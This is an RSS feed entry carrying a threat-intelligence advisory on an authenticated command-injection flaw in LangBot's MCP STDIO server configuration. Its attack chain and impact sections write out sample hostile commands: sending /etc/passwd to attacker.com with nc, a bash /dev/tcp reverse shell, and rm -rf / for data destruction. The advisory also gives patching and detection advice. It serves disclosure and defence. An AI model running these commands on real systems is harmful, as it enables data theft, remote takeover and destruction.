<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>LangBot - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/vendors/langbot/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Wed, 15 Jul 2026 17:41:12 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/vendors/langbot/feed.xml" rel="self" type="application/rss+xml"/><item><title>Authenticated Remote Code Execution in LangBot via MCP Configuration (CVE-2026-54449)</title><link>https://feed.craftedsignal.io/briefs/2026-07-langbot-authenticated-rce/</link><pubDate>Wed, 15 Jul 2026 17:41:12 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-07-langbot-authenticated-rce/</guid><description>An authenticated remote code execution vulnerability (CVE-2026-54449) exists in LangBot versions up to and including 4.10.5, allowing any authenticated user to achieve arbitrary command execution by modifying the MCP Server Configuration to include a crafted STDIO MCP command, enabling system takeover, data exfiltration, or reverse shells on affected instances.</description><content:encoded><![CDATA[<p>A critical authenticated remote code execution (RCE) vulnerability, tracked as CVE-2026-54449 (CWE-78: OS Command Injection), affects LangBot servers up to and including version 4.10.5. This flaw allows any authenticated user to execute arbitrary commands on the underlying operating system. The vulnerability stems from the <code>StdioServerParameters</code> component, imported from Anthropic's <code>modelcontextprotocol</code> open source, which directly executes user-supplied commands via a subprocess. An attacker with valid credentials can leverage the &quot;MCP Server Configuration&quot; feature by adding an &quot;STDIO&quot; type MCP with a malicious command. This poses a significant risk to publicly available LangBot instances, enabling full system takeover, data exfiltration, reverse shell establishment, or complete data destruction. The impact extends to local instances, facilitating lateral movement within internal networks.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker obtains or uses existing valid credentials to log in and access the LangBot server's web interface.</li>
<li>The attacker navigates to the &quot;Extensions&quot; section within the authenticated LangBot interface.</li>
<li>The attacker proceeds to the &quot;MCP&quot; tab and initiates the process to add a new MCP server configuration.</li>
<li>The attacker selects &quot;STDIO&quot; as the server configuration type, which is vulnerable to command injection.</li>
<li>The attacker inputs an arbitrary malicious command into the configuration field, such as <code>cat /etc/passwd | nc attacker.com 4444</code> for data exfiltration, <code>bash -i &gt;&amp; /dev/tcp/10.0.0.1/8080 0&gt;&amp;1</code> for a reverse shell, or <code>rm -rf / --no-preserve-root</code> for data destruction.</li>
<li>The LangBot service processes this new MCP configuration, causing the <code>StdioServerParameters</code> component to execute the attacker-supplied command on the underlying Linux server.</li>
<li>The malicious command executes with the privileges of the LangBot service user, achieving the attacker's objective, whether it be establishing command and control, exfiltrating sensitive data, or performing destructive actions.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This vulnerability (CVE-2026-54449) represents a severe authenticated remote code execution risk. Any publicly exposed LangBot instance running versions 4.10.5 or earlier is susceptible to complete compromise if an attacker can gain authenticated access. Successful exploitation allows for full system takeover, leading to the potential for sensitive data exfiltration (e.g., <code>/etc/passwd</code>), the establishment of persistent remote access via reverse shells, or even the complete destruction of the machine's data (<code>rm -rf /</code>). For internal deployments, this RCE can facilitate lateral movement within the network, allowing attackers to pivot to other systems.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Patch LangBot to a version greater than 4.10.5 immediately to address CVE-2026-54449.</li>
<li>Deploy the provided Sigma rule to detect common command injection patterns and post-exploitation activities, such as reverse shells or data exfiltration attempts.</li>
<li>Enable comprehensive process creation logging (e.g., using Sysmon for Linux or auditd) on all servers hosting LangBot to capture the execution of suspicious commands.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>rce</category><category>command-injection</category><category>linux</category><category>web-application</category><category>supply-chain</category></item></channel></rss>